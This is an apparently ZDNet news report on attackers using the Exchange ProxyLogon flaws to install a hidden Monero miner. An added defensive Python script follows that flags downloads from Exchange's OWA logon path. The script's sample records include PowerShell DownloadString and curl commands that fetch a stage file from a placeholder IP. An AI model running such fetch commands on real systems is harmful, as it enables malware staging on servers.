    Cyber criminals are targeting vulnerable Microsoft Exchange servers with cryptocurrency mining malware in a campaign designed to secretly use the processing power of compromised systems to make money. Zero-day vulnerabilities in Microsoft Exchange Server were detailed last month when Microsoft released critical security updates to prevent the exploitation of vulnerable systems.

    Exchange attacks

    Cyber attackers ranging from nation-state-linked hacking groups to ransomware gangs have rushed to take advantage of unpatched Exchange servers — but they’re not the only ones.

    Cybersecurity researchers at Sophos have identified attackers attempting to take advantage of the Microsoft Exchange Server ProxyLogon exploit to secretly install a Monero cryptominer on Exchange servers.

    “Server hardware is pretty desirable for cryptojacking because it usually has a higher performance than a desktop or laptop. Because the vulnerability permits the attackers to simply scan the whole internet for available, vulnerable machines, and then roll them into the network, it’s basically free money rolling in for the attackers,” Andrew Brandt, principal threat researcher at Sophos, told ZDNet.

    Monero isn’t nearly as valuable as Bitcoin, but it’s easier to mine and, crucially for cyber criminals, provides greater anonymity, making the owner of the wallet — and those behind attacks — harder to trace.

    While being compromised by a cryptocurrency miner might not sound as bad as a ransomware attack or the loss of sensitive data, it still represents a concern for organisations. That’s because it means cyber attackers have been able to secretly gain access to the network and, crucially, that the organisation still hasn’t applied the critical updates designed to protect against all manner of attacks.

    According to analysis by Sophos, the Monero wallet of the attacker behind this campaign began receiving funds from mining on March 9, just a few days after the Exchange vulnerabilities came to light, suggesting the attacker was quick off the mark in exploiting unpatched servers.

    The attacks begin with a PowerShell command that retrieves a file from a previously compromised server’s Outlook Web Access logon path, which in turn downloads executable payloads to install the Monero miner. Researchers note that the executable appears to contain a modified version of a tool that’s publicly available on Github; when the content is run on a compromised server, evidence of installation is deleted, while the mining process runs in memory.

    It’s unlikely that the operators of servers that have been hijacked by crypto-mining malware will notice there’s an issue — unless the attacker gets greedy and uses an extensive amount of processing power that’s easily identified as unusual.

    To protect networks against attacks that exploit the vulnerabilities in Microsoft Exchange Server, organisations are urged to apply the critical security updates as a matter of immediate priority.

    “A lot of this speaks to the need for servers, especially internet-facing servers, to be running modern endpoint protection on them. Other than that, Microsoft has spelled out pretty clearly what’s needed to patch the vulnerabilities, so admins need to just be diligent and do those things,” said Brandt.
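A defender-side check for the first stage the article describes (a command that fetches a file from a compromised Exchange server's OWA logon path), as an added example that is neither ZDNet's nor Sophos' code. The tab-separated record format, the host names, the 203.0.113.10 address and the assumption that the OWA logon path lives under /owa/auth/ are all constructed for the example.

```python
# Added example (not from the article or Sophos): flag process-command records
# in which a download primitive pulls a file from an Exchange server's Outlook
# Web Access logon path, the stage the article says starts the miner install.
import re
from dataclasses import dataclass
from typing import List, Optional

# Download primitives commonly seen in one-line commands (case-insensitive).
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadString|DownloadFile"
    r"|Net\.WebClient|Start-BitsTransfer|Invoke-RestMethod",
    re.IGNORECASE,
)
# Assumption: the OWA logon path is served under /owa/auth/ on the source host.
OWA_LOGON_URL_RE = re.compile(r"https?://[^\s\"']+/owa/auth/[^\s\"']*", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    process: str
    url: str
    severity: str  # "high" when the process is PowerShell, "medium" otherwise


def scan_record(record: str) -> Optional[Finding]:
    """Inspect one constructed record: '<host>\\t<process image>\\t<command line>'.

    A record is flagged only when it both uses a download primitive and points
    at an OWA logon URL; a download alone or an OWA URL alone is not enough.
    """
    parts = record.rstrip("\n").split("\t", 2)
    if len(parts) != 3:
        return None  # malformed record: ignore rather than guess
    host, process, cmdline = parts
    if not DOWNLOAD_RE.search(cmdline):
        return None
    match = OWA_LOGON_URL_RE.search(cmdline)
    if not match:
        return None
    severity = "high" if "powershell" in process.lower() else "medium"
    return Finding(host, process, match.group(0), severity)


def scan_records(records: List[str]) -> List[Finding]:
    """Run scan_record over a batch and keep only the hits, in input order."""
    return [f for f in (scan_record(r) for r in records) if f is not None]


# Constructed sample records; 203.0.113.10 is a documentation-range address.
SAMPLE_RECORDS = [
    "EXCH01\tpowershell.exe\tpowershell -c "
    "\"(New-Object Net.WebClient).DownloadString('http://203.0.113.10/owa/auth/stage.txt')\"",
    "EXCH01\tpowershell.exe\tGet-MailboxDatabase | Format-Table",
    "WS-42\tpowershell.exe\tInvoke-WebRequest https://updates.example.com/agent.msi -OutFile agent.msi",
    "EXCH02\tcmd.exe\tcurl http://203.0.113.10/owa/auth/stage.txt -o C:\\Temp\\stage.txt",
]

if __name__ == "__main__":
    for finding in scan_records(SAMPLE_RECORDS):
        print(f"[{finding.severity}] {finding.host}: {finding.process} fetched {finding.url}")
```

Only the two records that combine a download primitive with an OWA logon URL are flagged; the ordinary Exchange cmdlet and the download from an unrelated update host are not.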
